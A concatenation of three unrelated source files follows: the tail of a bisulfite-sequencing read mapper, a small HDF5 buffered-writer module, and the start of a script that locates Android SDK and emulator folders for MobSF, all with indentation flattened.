#-------------------------------------------------------------------
# un-directional sequencing
#-------------------------------------------------------------------
if asktag=="Y":
#----------------------------------------------------------------
outfile2=tmp_d('Trimmed_C2T.fa'+random_id)
outfile3=tmp_d('Trimmed_G2A.fa'+random_id)
outf2=open(outfile2,'w')
outf3=open(outfile3,'w')
#----------------------------------------------------------------
# detect format of input file
try :
if read_file.endswith(".gz") : # support input file ending with ".gz"
read_inf = gzip.open(read_file, "rb")
else :
read_inf=open(read_file,"r")
except IOError :
print "[Error] Cannot open input file : %s" % read_file
exit(-1)
logm("Start reading and trimming the input sequences")
oneline = read_inf.readline()
if oneline == "" :
oneline = "NNNN"
l = oneline.split()
input_format = ""
if oneline[0]=="@":
input_format = "fastq"
elif len(l)==1 and oneline[0]!=">":
input_format = "seq"
elif len(l)==11:
input_format = "qseq"
elif oneline[0]==">":
input_format = "fasta"
read_inf.close()
#----------------------------------------------------------------
# read sequence, remove adapter and convert
read_id = ""
seq = ""
seq_ready = "N"
line_no = 0
fw_trimmed = 0
rc_trimmed = 0
for line in fileinput.input(read_file, openhook=fileinput.hook_compressed): # allow input with .gz
if line == "" : # fix bug for empty input line
line = "NNNN"
l = line.split()
line_no += 1
if input_format=="seq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[0]
seq_ready = "Y"
elif input_format=="fastq":
l_fastq = math.fmod(line_no, 4)
if l_fastq == 1 :
all_raw_reads += 1
read_id = l[0][1:]
seq_ready = "N"
elif l_fastq == 2 :
seq = l[0]
seq_ready = "Y"
else :
seq = ""
seq_ready = "N"
elif input_format=="qseq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[8]
seq_ready = "Y"
elif input_format=="fasta" :
l_fasta = math.fmod(line_no,2)
if l_fasta==1:
all_raw_reads += 1
read_id = l[0][1:]
seq = ""
seq_ready = "N"
elif l_fasta==0 :
seq = l[0]
seq_ready = "Y"
#----------------------------------------------------------------
if seq_ready=="Y":
seq=seq[cut1-1:cut2] #<---- selecting 0..52 from 1..72 -e 52
seq=seq.upper()
seq=seq.replace(".","N")
# striping BS adapter from 3' read
all_base_before_trim += len(seq)
if (adapter_fw !="") or (adapter_rc !="") :
new_read = RemoveAdapter(seq, adapter_fw, adapter_mismatch)
if len(new_read) < len(seq) :
fw_trimmed += 1
new_read_len = len(new_read)
#print new_read
new_read = Remove_5end_Adapter(new_read, adapter_rc, adapter_mismatch)
new_read = RemoveAdapter(new_read, adapter_fw, adapter_mismatch)
if len(new_read) < new_read_len :
rc_trimmed += 1
#print new_read
if len(new_read) < len(seq) :
all_trimmed += 1
seq = new_read
all_base_after_trim += len(seq)
if len(seq)<=4:
seq=''.join(["N" for x in xrange(cut2-cut1+1)])
#--------- trimmed_raw_BS_read ------------------
original_bs_reads[read_id] = seq
#--------- FW_C2T ------------------
outf2.write('>%s\n%s\n' % (read_id, seq.replace("C","T")))
#--------- RC_G2A ------------------
outf3.write('>%s\n%s\n' % (read_id, seq.replace("G","A")))
fileinput.close()
outf2.close()
outf3.close()
delete_files(read_file)
logm("Reads trimmed from 3\' end : %d " % fw_trimmed)
logm("Reads trimmed from 5\' end : %d " % rc_trimmed)
#--------------------------------------------------------------------------------
# Bowtie mapping
#-------------------------------------------------------------------------------
logm("Start mapping")
WC2T=tmp_d("W_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
CC2T=tmp_d("C_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
WG2A=tmp_d("W_G2A_m"+str(max_mismatch_no)+".mapping"+random_id)
CG2A=tmp_d("C_G2A_m"+str(max_mismatch_no)+".mapping"+random_id)
# print aligner_command % {'int_no_mismatches' : int_no_mismatches,
# 'reference_genome' : os.path.join(db_path,'W_C2T'),
# 'input_file' : outfile2,
# 'output_file' : WC2T}
run_in_parallel([ aligner_command % {'reference_genome' : os.path.join(db_path,'W_C2T'),
'input_file' : outfile2,
'output_file' : WC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_C2T'),
'input_file' : outfile2,
'output_file' : CC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'W_G2A'),
'input_file' : outfile3,
'output_file' : WG2A},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_G2A'),
'input_file' : outfile3,
'output_file' : CG2A} ])
delete_files(outfile2, outfile3)
#--------------------------------------------------------------------------------
# Post processing
#--------------------------------------------------------------------------------
FW_C2T_U,FW_C2T_R=extract_mapping(WC2T)
RC_G2A_U,RC_G2A_R=extract_mapping(CG2A)
FW_G2A_U,FW_G2A_R=extract_mapping(WG2A)
RC_C2T_U,RC_C2T_R=extract_mapping(CC2T)
#----------------------------------------------------------------
# get unique-hit reads
#----------------------------------------------------------------
Union_set=set(FW_C2T_U.iterkeys()) | set(RC_G2A_U.iterkeys()) | set(FW_G2A_U.iterkeys()) | set(RC_C2T_U.iterkeys())
Unique_FW_C2T=set() # +
Unique_RC_G2A=set() # +
Unique_FW_G2A=set() # -
Unique_RC_C2T=set() # -
Multiple_hits=set()
for x in Union_set:
_list=[]
for d in [FW_C2T_U, RC_G2A_U, FW_G2A_U, RC_C2T_U]:
mis_lst=d.get(x,[99])
mis=int(mis_lst[0])
_list.append(mis)
for d in [FW_C2T_R, RC_G2A_R, FW_G2A_R, RC_C2T_R]:
mis=d.get(x,99)
_list.append(mis)
mini=min(_list)
if _list.count(mini) == 1:
mini_index=_list.index(mini)
if mini_index == 0:
Unique_FW_C2T.add(x)
elif mini_index == 1:
Unique_RC_G2A.add(x)
elif mini_index == 2:
Unique_FW_G2A.add(x)
elif mini_index == 3:
Unique_RC_C2T.add(x)
# if mini_index = 4,5,6,7, indicating multiple hits
else :
Multiple_hits.add(x)
else :
Multiple_hits.add(x)
# write reads rejected by Multiple Hits to file
if show_multiple_hit is not None :
#outf_MH=open(show_multiple_hit,'w')
for i in Multiple_hits :
outf_MH.write(">%s\n" % i)
outf_MH.write("%s\n" % original_bs_reads[i])
#outf_MH.close()
# write unmapped reads to file
if show_unmapped_hit is not None :
#outf_UH=open(show_unmapped_hit,'w')
for i in original_bs_reads :
if i not in Union_set :
outf_UH.write(">%s\n" % i)
outf_UH.write("%s\n" % original_bs_reads[i])
#outf_UH.close()
del Union_set
del FW_C2T_R
del FW_G2A_R
del RC_C2T_R
del RC_G2A_R
FW_C2T_uniq_lst=[[FW_C2T_U[u][1],u] for u in Unique_FW_C2T]
FW_G2A_uniq_lst=[[FW_G2A_U[u][1],u] for u in Unique_FW_G2A]
RC_C2T_uniq_lst=[[RC_C2T_U[u][1],u] for u in Unique_RC_C2T]
RC_G2A_uniq_lst=[[RC_G2A_U[u][1],u] for u in Unique_RC_G2A]
FW_C2T_uniq_lst.sort()
RC_C2T_uniq_lst.sort()
FW_G2A_uniq_lst.sort()
RC_G2A_uniq_lst.sort()
FW_C2T_uniq_lst=[x[1] for x in FW_C2T_uniq_lst]
RC_C2T_uniq_lst=[x[1] for x in RC_C2T_uniq_lst]
FW_G2A_uniq_lst=[x[1] for x in FW_G2A_uniq_lst]
RC_G2A_uniq_lst=[x[1] for x in RC_G2A_uniq_lst]
#----------------------------------------------------------------
numbers_premapped_lst[0] += len(Unique_FW_C2T)
numbers_premapped_lst[1] += len(Unique_RC_G2A)
numbers_premapped_lst[2] += len(Unique_FW_G2A)
numbers_premapped_lst[3] += len(Unique_RC_C2T)
del Unique_FW_C2T
del Unique_FW_G2A
del Unique_RC_C2T
del Unique_RC_G2A
#----------------------------------------------------------------
nn=0
gseq = dict()
chr_length = dict()
for ali_unique_lst, ali_dic in [(FW_C2T_uniq_lst,FW_C2T_U),
(RC_G2A_uniq_lst,RC_G2A_U),
(FW_G2A_uniq_lst,FW_G2A_U),
(RC_C2T_uniq_lst,RC_C2T_U)]:
nn += 1
for header in ali_unique_lst:
_, mapped_chr, mapped_location, cigar = ali_dic[header]
original_BS = original_bs_reads[header]
#-------------------------------------
if mapped_chr not in gseq:
gseq[mapped_chr] = deserialize(db_d(mapped_chr))
chr_length[mapped_chr] = len(gseq[mapped_chr])
if nn == 2 or nn == 3:
cigar = list(reversed(cigar))
r_start, r_end, g_len = get_read_start_end_and_genome_length(cigar)
all_mapped += 1
if nn == 1: # +FW mapped to + strand:
FR = "+FW"
mapped_strand="+"
elif nn == 2: # +RC mapped to + strand:
FR = "+RC" # RC reads from -RC reflecting the methylation status on Watson strand (+)
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
mapped_strand = "+"
original_BS = reverse_compl_seq(original_BS) # for RC reads
elif nn == 3: # -RC mapped to - strand:
mapped_strand = "-"
FR = "-RC" # RC reads from +RC reflecting the methylation status on Crick strand (-)
original_BS = reverse_compl_seq(original_BS) # for RC reads
elif nn == 4: # -FW mapped to - strand:
mapped_strand = "-"
FR = "-FW"
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
origin_genome, next, output_genome = get_genomic_sequence(gseq[mapped_chr], mapped_location, mapped_location + g_len, mapped_strand)
r_aln, g_aln = cigar_to_alignment(cigar, original_BS, origin_genome)
if len(r_aln)==len(g_aln):
N_mismatch = N_MIS(r_aln, g_aln)
# if N_mismatch <= int(max_mismatch_no):
mm_no=float(max_mismatch_no)
if (mm_no>=1 and N_mismatch<=mm_no) or (mm_no<1 and N_mismatch<=(mm_no*len(r_aln)) ):
numbers_mapped_lst[nn-1] += 1
all_mapped_passed += 1
methy = methy_seq(r_aln, g_aln + next)
mC_lst, uC_lst = mcounts(methy, mC_lst, uC_lst)
#---XS FILTER----------------
XS = 0
nCH = methy.count('y') + methy.count('z')
nmCH = methy.count('Y') + methy.count('Z')
if( (nmCH>XS_count) and nmCH/float(nCH+nmCH)>XS_pct ) :
XS = 1
outfile.store(header, N_mismatch, FR, mapped_chr, mapped_strand, mapped_location, cigar, original_BS, methy, XS, output_genome = output_genome)
all_base_mapped += len(original_BS)
#----------------------------------------------------------------
logm("--> %s (%d) "%(read_file, no_my_files))
delete_files(WC2T, WG2A, CC2T, CG2A)
#--------------------------------------------------------------------
# directional sequencing
#--------------------------------------------------------------------
if asktag=="N":
#----------------------------------------------------------------
outfile2=tmp_d('Trimmed_C2T.fa'+random_id)
outf2=open(outfile2,'w')
#----------------------------------------------------------------
try :
if read_file.endswith(".gz") : # support input file ending with ".gz"
read_inf = gzip.open(read_file, "rb")
else :
read_inf=open(read_file,"r")
except IOError :
print "[Error] Cannot open input file : %s" % read_file
exit(-1)
logm("Start reading and trimming the input sequences")
oneline = read_inf.readline()
if oneline == "" :
oneline = "NNNN"
l = oneline.split()
input_format = ""
if oneline[0]=="@":
input_format = "fastq"
elif len(l)==1 and oneline[0]!=">":
input_format = "seq"
elif len(l)==11:
input_format = "qseq"
elif oneline[0]==">":
input_format = "fasta"
read_inf.close()
#print "detected data format: %s"%(input_format)
#----------------------------------------------------------------
read_id=""
seq=""
seq_ready="N"
line_no = 0
for line in fileinput.input(read_file, openhook=fileinput.hook_compressed):
if l == "" :
l = "NNNN"
l = line.split()
line_no += 1
if input_format=="seq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[0]
seq_ready = "Y"
elif input_format=="fastq":
l_fastq = math.fmod(line_no, 4)
if l_fastq == 1 :
all_raw_reads += 1
read_id = l[0][1:]
seq_ready = "N"
elif l_fastq == 2 :
seq = l[0]
seq_ready = "Y"
else :
seq = ""
seq_ready = "N"
elif input_format=="qseq":
all_raw_reads += 1
read_id = str(all_raw_reads)
read_id = read_id.zfill(12)
seq = l[8]
seq_ready = "Y"
elif input_format=="fasta" :
l_fasta = math.fmod(line_no,2)
if l_fasta==1:
all_raw_reads += 1
read_id = l[0][1:]
seq = ""
seq_ready = "N"
elif l_fasta==0 :
seq = l[0]
seq_ready = "Y"
#--------------------------------
if seq_ready=="Y":
seq=seq[cut1-1:cut2] #<---selecting 0..52 from 1..72 -e 52
seq=seq.upper()
seq=seq.replace(".","N")
#--striping adapter from 3' read -------
all_base_before_trim += len(seq)
if adapter != "":
new_read = RemoveAdapter(seq, adapter, adapter_mismatch)
if len(new_read) < len(seq) :
all_trimmed += 1
seq = new_read
all_base_after_trim += len(seq)
if len(seq)<=4:
seq = "N" * (cut2-cut1+1)
#--------- trimmed_raw_BS_read ------------------
original_bs_reads[read_id] = seq
#--------- FW_C2T ------------------
outf2.write('>%s\n%s\n' % (read_id, seq.replace("C","T")))
fileinput.close()
outf2.close()
delete_files(read_file)
#--------------------------------------------------------------------------------
# Bowtie mapping
#--------------------------------------------------------------------------------
logm("Start mapping")
WC2T=tmp_d("W_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
CC2T=tmp_d("C_C2T_m"+str(max_mismatch_no)+".mapping"+random_id)
run_in_parallel([ aligner_command % {'reference_genome' : os.path.join(db_path,'W_C2T'),
'input_file' : outfile2,
'output_file' : WC2T},
aligner_command % {'reference_genome' : os.path.join(db_path,'C_C2T'),
'input_file' : outfile2,
'output_file' : CC2T} ])
delete_files(outfile2)
#--------------------------------------------------------------------------------
# Post processing
#--------------------------------------------------------------------------------
FW_C2T_U, FW_C2T_R = extract_mapping(WC2T)
RC_C2T_U, RC_C2T_R = extract_mapping(CC2T)
#----------------------------------------------------------------
# get uniq-hit reads
#----------------------------------------------------------------
Union_set = set(FW_C2T_U.iterkeys()) | set(RC_C2T_U.iterkeys())
Unique_FW_C2T = set() # +
Unique_RC_C2T = set() # -
Multiple_hits=set()
# write reads rejected by Multiple Hits to file
for x in Union_set:
_list=[]
for d in [FW_C2T_U,RC_C2T_U]:
mis_lst=d.get(x,[99])
mis=int(mis_lst[0])
_list.append(mis)
for d in [FW_C2T_R,RC_C2T_R]:
mis=d.get(x,99)
_list.append(mis)
mini=min(_list)
#print _list
if _list.count(mini)==1:
mini_index=_list.index(mini)
if mini_index==0:
Unique_FW_C2T.add(x)
elif mini_index==1:
Unique_RC_C2T.add(x)
else:
Multiple_hits.add(x)
else :
Multiple_hits.add(x)
# write reads rejected by Multiple Hits to file
if show_multiple_hit is not None:
#outf_MH=open(show_multiple_hit,'w')
for i in Multiple_hits :
outf_MH.write(">%s\n" % i)
outf_MH.write("%s\n" % original_bs_reads[i])
#outf_MH.close()
# write unmapped reads to file
if show_unmapped_hit is not None :
#outf_UH=open(show_unmapped_hit,'w')
for i in original_bs_reads :
if i not in Union_set :
outf_UH.write(">%s\n" % i)
outf_UH.write("%s\n" % original_bs_reads[i])
#outf_UH.close()
FW_C2T_uniq_lst=[[FW_C2T_U[u][1],u] for u in Unique_FW_C2T]
RC_C2T_uniq_lst=[[RC_C2T_U[u][1],u] for u in Unique_RC_C2T]
FW_C2T_uniq_lst.sort()
RC_C2T_uniq_lst.sort()
FW_C2T_uniq_lst=[x[1] for x in FW_C2T_uniq_lst]
RC_C2T_uniq_lst=[x[1] for x in RC_C2T_uniq_lst]
#----------------------------------------------------------------
numbers_premapped_lst[0] += len(Unique_FW_C2T)
numbers_premapped_lst[1] += len(Unique_RC_C2T)
#----------------------------------------------------------------
nn = 0
gseq = dict()
chr_length = dict()
for ali_unique_lst, ali_dic in [(FW_C2T_uniq_lst,FW_C2T_U),(RC_C2T_uniq_lst,RC_C2T_U)]:
nn += 1
for header in ali_unique_lst:
_, mapped_chr, mapped_location, cigar = ali_dic[header]
original_BS = original_bs_reads[header]
#-------------------------------------
if mapped_chr not in gseq :
gseq[mapped_chr] = deserialize(db_d(mapped_chr))
chr_length[mapped_chr] = len(gseq[mapped_chr])
r_start, r_end, g_len = get_read_start_end_and_genome_length(cigar)
all_mapped+=1
if nn == 1: # +FW mapped to + strand:
FR = "+FW"
mapped_strand = "+"
elif nn == 2: # -FW mapped to - strand:
mapped_strand = "-"
FR = "-FW"
mapped_location = chr_length[mapped_chr] - mapped_location - g_len
origin_genome, next, output_genome = get_genomic_sequence(gseq[mapped_chr], mapped_location, mapped_location + g_len, mapped_strand)
r_aln, g_aln = cigar_to_alignment(cigar, original_BS, origin_genome)
if len(r_aln) == len(g_aln):
N_mismatch = N_MIS(r_aln, g_aln) #+ original_BS_length - (r_end - r_start) # mismatches in the alignment + soft clipped nucleotides
mm_no=float(max_mismatch_no)
if (mm_no>=1 and N_mismatch<=mm_no) or (mm_no<1 and N_mismatch<=(mm_no*len(r_aln)) ):
numbers_mapped_lst[nn-1] += 1
all_mapped_passed += 1
methy = methy_seq(r_aln, g_aln+next)
mC_lst, uC_lst = mcounts(methy, mC_lst, uC_lst)
#---XS FILTER----------------
XS = 0
nCH = methy.count('y') + methy.count('z')
nmCH = methy.count('Y') + methy.count('Z')
if( (nmCH>XS_count) and nmCH/float(nCH+nmCH)>XS_pct ) :
XS = 1
outfile.store(header, N_mismatch, FR, mapped_chr, mapped_strand, mapped_location, cigar, original_BS, methy, XS, output_genome = output_genome)
all_base_mapped += len(original_BS)
#----------------------------------------------------------------
logm("--> %s (%d) "%(read_file,no_my_files))
delete_files(WC2T, CC2T)
#----------------------------------------------------------------
delete_files(tmp_path)
if show_multiple_hit is not None:
outf_MH.close()
if show_unmapped_hit is not None :
outf_UH.close()
logm("----------------------------------------------" )
logm("Number of raw reads: %d" % all_raw_reads)
if all_raw_reads > 0 :
logm("Number of bases in total: %d " % all_base_before_trim)
if (asktag == "N" and adapter != "") or (asktag == "Y" and adapter_fw != "") :
logm("Number of reads having adapter removed: %d" % all_trimmed )
trim_percent = (float(all_base_after_trim)/all_base_before_trim) if all_base_before_trim>0 else 0
logm("Number of bases after trimming the adapters: %d (%1.3f)" % (all_base_after_trim, trim_percent) )
#
logm("Number of reads are rejected because of multiple hits: %d" % len(Multiple_hits) )
logm("Number of unique-hits reads (before post-filtering): %d" % all_mapped)
if asktag == "Y":
logm(" %7d FW reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[0]) )
logm(" %7d RC reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[1]) )
logm(" %7d FW reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[2]) )
logm(" %7d RC reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[3]) )
elif asktag == "N":
logm(" %7d FW reads mapped to Watson strand (before post-filtering)" % (numbers_premapped_lst[0]) )
logm(" %7d FW reads mapped to Crick strand (before post-filtering)" % (numbers_premapped_lst[1]) )
logm("Post-filtering %d uniquely aligned reads with mismatches <= %s" % (all_mapped_passed, max_mismatch_no) )
if asktag == "Y":
logm(" %7d FW reads mapped to Watson strand" % (numbers_mapped_lst[0]) )
logm(" %7d RC reads mapped to Watson strand" % (numbers_mapped_lst[1]) )
logm(" %7d FW reads mapped to Crick strand" % (numbers_mapped_lst[2]) )
logm(" %7d RC reads mapped to Crick strand" % (numbers_mapped_lst[3]) )
elif asktag == "N":
logm(" %7d FW reads mapped to Watson strand" % (numbers_mapped_lst[0]) )
logm(" %7d FW reads mapped to Crick strand" % (numbers_mapped_lst[1]) )
Mappability = (100 * float(all_mapped_passed) / all_raw_reads) if all_raw_reads>0 else 0
logm("Mappability = %1.4f%%" % Mappability )
logm("Total bases of uniquely mapped reads : %7d" % all_base_mapped )
#
n_CG = mC_lst[0] + uC_lst[0]
n_CHG = mC_lst[1] + uC_lst[1]
n_CHH = mC_lst[2] + uC_lst[2]
#
logm("----------------------------------------------" )
logm("Methylated C in mapped reads ")
#
logm(" mCG %1.3f%%" % ((100*float(mC_lst[0])/n_CG) if n_CG != 0 else 0))
logm(" mCHG %1.3f%%" % ((100*float(mC_lst[1])/n_CHG) if n_CHG != 0 else 0))
logm(" mCHH %1.3f%%" % ((100*float(mC_lst[2])/n_CHH) if n_CHH != 0 else 0))
#
logm("----------------------------------------------" )
logm("File : %s" % main_read_file )
elapsed("Resource / CPU time")
logm("------------------- END --------------------" )
close_log()
|
iambernie/hdf5handler | refs/heads/master | hdf5handler/handler.py | 1 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
TODO: Write this missing docstring
"""
import h5py
import numpy
class HDF5Handler(object):
"""
The idea is that the HDF5Handler mimics the behaviour of 'open' used as a
context manager using the 'with' statement:
>>> with open('myfile.txt','w') as file:
... file.write("This is a line. \n")
... file.write("This is another line. \n")
...
>>>
which would result in the file 'myfile.txt' containing:
--------------- myfile.txt ------------------
This is a line.
This is another line.
---------------------------------------------
To "write" data with HDF5Handler, simply call it's put() method.
>>> from hdf5handler import HDF5Handler
>>> thisdata = [1,2,3]
>>> thatdata = [3,2,1]
>>> with HDF5Handler('mydata.hdf5') as handler:
... handler.put(thisdata, "/at/this/location/")
... handler.put(thatdata, "/at/that/location/")
...
>>>
Another Example
---------------
>>> with HDF5Handler('mydata.hdf5') as handler:
... a_scalar = 1.0
... a_list = [1, 2, 3]
... a_numpy_scalar = numpy.float16(1.0)
... an_ndarray = numpy.arange([1, 2, 3])
... for i in range(5):
... handler.put(a_scalar, '/somepath/scalars')
... handler.put(a_list, '/somepath/lists')
... handler.put(a_numpy_scalar, '/numpies/scalars')
... handler.put(an_ndarray, '/numpies/arrays')
...
>>>
Since the second argument of handler.put is simply a POSIX-style path,
this will structure your HDF5 file with the following hierarchy:
/
├── numpies <-- h5py.Group
│ ├── arrays <-- h5py.Dataset
│ └── scalars <-- h5py.Dataset
└── somepath
├── lists
└── scalars
So Datasets and Groups are quite analogous to Files and Folders.
#TODO: open mydata.hdf5 and show it indeed contains the data.
"""
def __init__(self, filename, mode='w', prefix=None):
"""
Parameters
----------
filename : str
filename of the hdf5 file.
mode : str
Python mode to open file. The mode can be 'w' or 'a' for writing or
appending. #TODO, check if 'a' mode really works...
prefix : str
#TODO explain prefix, and show typical use case.
"""
self.filename = filename
self.mode = mode
self.prefix = prefix
self.index = dict()
self.index_converters = dict()
def __enter__(self):
# According to h5py docs, libver='latest' is specified for potential
# performance advantages procured by maximum file structure
# sophistication. (Could also mean losing some backwards compatibility)
self.file = h5py.File(self.filename, self.mode, libver='latest')
return self
def __exit__(self, extype, exvalue, traceback):
self.flushbuffers()
self.file.close()
return False
#TODO; how to avoid code replication here?
def open(self):
self.file = h5py.File(self.filename, self.mode, libver='latest')
#TODO; how to avoid code replication here?
def close(self):
self.flushbuffers()
self.file.close()
def put(self, data, dset_path, **kwargs):
"""
Parameters
----------
data : any valid data type.
What is meant by "valid" here, is that <data> must be
convertible with:
>>> numpy.array(data)
so this includes things such as:
scalars : bool, int, float
numpy.int, numpy.float, etc..
lists : [int, int, ...]
[(float, float), (float, float)]
tuples : (float, float, ...)
However, "valid" in the HDF5Handler also means <data> must also
be numeric. This means that the following should not throw a
TypeError:
>>> numpy.array(data)/1.0
Which it will (or should), if <data> contains strings.
dset_path : str
unix-style path ( 'group/datasetname' )
Valid keyword arguments are:
dtype
chunksize
blockfactor
"""
if self.prefix:
fulldsetpath = self.prefix+dset_path
else:
fulldsetpath = dset_path
try:
converter = self.index_converters[fulldsetpath]
ndarray = converter(data)
self.index[fulldsetpath].append_to_dbuffer(ndarray)
except KeyError:
self.create_dset(data, fulldsetpath, **kwargs)
self.put(data, dset_path, **kwargs)
def create_dset(self, data, dset_path, chunksize=1000, blockfactor=100,
dtype='float64'):
"""
Define h5py dataset parameters here.
Parameters
----------
dset_pathi : str
A POSIX-style path which will be used as the location for the h5py
dataset. For example:
data: any valid data. See HDF5Handler.put.__doc__
blockfactor : int
Used to calculate blocksize. (blocksize = blockfactor*chunksize)
chunksize : int
Determines the buffersize. (e.g.: if chunksize = 1000, the buffer
will be written to the dataset after a 1000 HDF5Handler.put()
calls. You want to make sure that the buffersize is between
10KiB - 1 MiB = 1048576 bytes.
This has serious performance implications if chosen too big or
too small, so I'll repeat that:
MAKE SURE YOU CHOOSE YOUR CHUNKSIZE SUCH THAT THE BUFFER
DOES NOT EXCEED 1048576 bytes.
See h5py docs on chunked storage for more info:
http://docs.h5py.org/en/latest/high/dataset.html#chunked-storage
#TODO: Show an example of how you would approximate a good chunksize
dtype : str
One of numpy's dtypes.
int8
int16
float16
float32
etc.
"""
arr_shape = get_shape(data)
converter = get_ndarray_converter(data)
blocksize = blockfactor * chunksize
chunkshape = sum(((chunksize,), arr_shape), ())
maxshape = sum(((None,), arr_shape), ())
dsetkw = dict(chunks=chunkshape, maxshape=maxshape, dtype=dtype)
init_shape = sum(((blocksize,), arr_shape), ())
dset = self.file.create_dataset(dset_path, shape=init_shape, **dsetkw)
self.index.update({dset_path: Dataset(dset)})
self.index_converters.update({dset_path: converter})
def flushbuffers(self):
"""
When the number of handler.put calls is not a multiple of buffersize,
then there will be unwritten arrays in dbuffer, since dbuffer is only
written when it is full. Call this method to write unwritten arrays in
all of the dbuffers.
"""
for dset in self.index.values():
dset.flush()
#TODO: a method to easily add a comment to the attrs of a dataset.
def add_comment(self):
"""
#TODO: write example of how you would like to use this
"""
pass
#TODO: an option to enable one of the lossless compression filters
# supported by h5py: gzip, lzf, szip
def compress_with(self):
"""
#TODO: write example of how you would like to use this
"""
pass
class Dataset(object):
""" TODO: write docstring"""
def __init__(self, dset):
"""
Parameters
----------
dset: h5py Dataset
"""
self.dset = dset
self.chunkcounter = 0
self.blockcounter = 0
self.chunksize = dset.chunks[0]
self.blocksize = dset.shape[0]
self.arr_shape = dset.shape[1:]
self.dbuffer = list()
def append_to_dbuffer(self, array):
"""
Parameters
----------
array: ndarray
"""
self.dbuffer.append(array)
if len(self.dbuffer) == self.chunksize: # THEN WRITE AND CLEAR BUFFER
begin = self.blockcounter*self.blocksize + \
self.chunkcounter*self.chunksize
end = begin + self.chunksize
dbuffer_ndarray = numpy.array(self.dbuffer)
self.dset[begin:end, ...] = dbuffer_ndarray # WRITES BUFFER
self.dbuffer = list() # CLEARS BUFFER
if end == self.dset.shape[0]: #BLOCK IS FULL --> CREATE NEW BLOCK
new_shape = sum(((end+self.blocksize,), self.arr_shape), ())
self.dset.resize(new_shape)
self.blockcounter += 1
self.chunkcounter = 0
else:
self.chunkcounter += 1
else:
pass #wait till dbuffer is 'full'
def flush(self, trim=True):
"""
Flushes the dbuffer, i.e. writes arrays in the dbuffer and resizes the
dataset.
"""
dbuffer = self.dbuffer
dbuffer_ndarray = numpy.array(dbuffer)
begin = self.blockcounter*self.blocksize +\
self.chunkcounter*self.chunksize
end = begin + len(dbuffer)
self.dset[begin:end, ...] = dbuffer_ndarray
self.dbuffer = list()
if trim:
new_shape = sum(((end,), self.arr_shape), ())
self.dset.resize(new_shape)
def get_ndarray_converter(data):
"""
get_ndarray_converter will throw an exception if the data is not "numeric".
Otherwise, the following applies:
If the data is of type (numpy.ndarray | int | float, bool), this returns the
identity function, otherwise it returns numpy.ndarray (as in the function)
Parameters
----------
data: any valid data format. See HDF5Handler.put.__doc__
Return
------
identity OR numpy.array
"""
try:
numpy.array(data)/1.0
except TypeError:
raise Exception("{} contains non-numeric objects.".format(data))
def identity(data):
""" The identity function."""
return data
if isinstance(data, numpy.ndarray):
return identity
elif isinstance(data, (list, tuple)):
return numpy.array
elif isinstance(data, (int, float, bool, numpy.number)):
return identity
else:
msg = "type {} could not be converted to ndarray. ".format(type(data))
raise Exception(msg)
def get_shape(data):
"""
Parameters
----------
data: any valid data format. See HDF5Handler.put.__doc__
Return
------
returns () if it is a scalar, else it returns numpy.array(data).shape """
if isinstance(int, float):
return ()
else:
return numpy.array(data).shape
|
ajinabraham/Mobile-Security-Framework-MobSF | refs/heads/master | scripts/mobsfy_AVD.py | 1 | #!/usr/bin/env python
# -*- coding: utf_8 -*-
import os
import platform
import subprocess
import sys
import getpass
import shutil
import io
import string
import re
import logging
logger = logging.getLogger(__name__)
BASE_DIR = os.path.join(os.path.dirname(os.path.realpath(__file__)), "../")
def get_windows_drive():
drive = os.getenv('WINDIR')[:1] + ':'
if not drive:
return 'C:'
return drive
def print_log(msg, log_type='INFO'):
print('\n[' + log_type + '] ' + msg + '\n')
def execute_cmd(args, ret=False):
try:
logger.info("Executing Command - " + ' '.join(args))
if ret:
return subprocess.check_output(args)
else:
subprocess.call(args)
except Exception as e:
logger.error("Executing Command - " + str(e))
def verify_path(help_msg):
path = input(help_msg + ': ')
path = path.strip()
while not os.path.exists(path):
print_log('Path specified does not exists \ no access', 'ERROR')
path = input(help_msg)
return path
def guess_android_avd_folder():
system = platform.system()
if system == 'Darwin':
username = getpass.getuser()
first_guess = os.path.join('/Users', username, '.android/avd')
if os.path.exists(first_guess):
return first_guess
elif system == "Linux":
for path in [os.path.expanduser('~/.android/avd/')]:
if os.path.exists(path):
return path
elif system == 'Windows':
username = getpass.getuser()
drive = get_windows_drive()
for path in [os.path.join(drive + '\\Documents and Settings', username, '.android\\avd'),
os.path.join(drive + '\\Users', username, '.android\\avd')]:
if os.path.exists(path):
return path
return False
def guess_android_sdk_folder():
system = platform.system()
username = getpass.getuser()
if system == 'Darwin':
for path in [os.path.join('/Users', username, 'Library/Android/Sdk/'),
os.path.join('/Users', username, 'Library/Android/sdk/')]:
if os.path.exists(path):
return path
elif system == "Linux":
for path in ['/usr/local/android-sdk',
'/usr/local/android',
'/usr/local/Android',
os.path.expanduser('~/Android/Sdk'),
os.path.expanduser('~/Android/sdk'),
os.path.expanduser('~/android/Sdk'),
os.path.expanduser('~/android/sdk')]:
if os.path.exists(path):
return path
elif system == 'Windows':
drive = get_windows_drive()
for path in [os.path.join(drive + '\\Users', username, 'AppData\\Local\\Android\\sdk'),
os.path.join(drive + '\\Users', username,
'AppData\\Local\\Android\\Sdk'),
os.path.join(drive + '\\Documents and Settings',
username, 'AppData\\Local\\Android\\sdk'),
os.path.join(drive + '\\Documents and Settings', username, 'AppData\\Local\\Android\\Sdk')]:
if os.path.exists(path):
return path
return False
def find_emulator_binary(sdk):
system = platform.system()
if system in ['Darwin', 'Linux']:
# Prefer emulator folder on tools folder
for path in [os.path.join(sdk, 'emulator', 'emulator'),
os.path.join(sdk, 'tools', 'emulator')]:
if os.path.exists(path):
return path
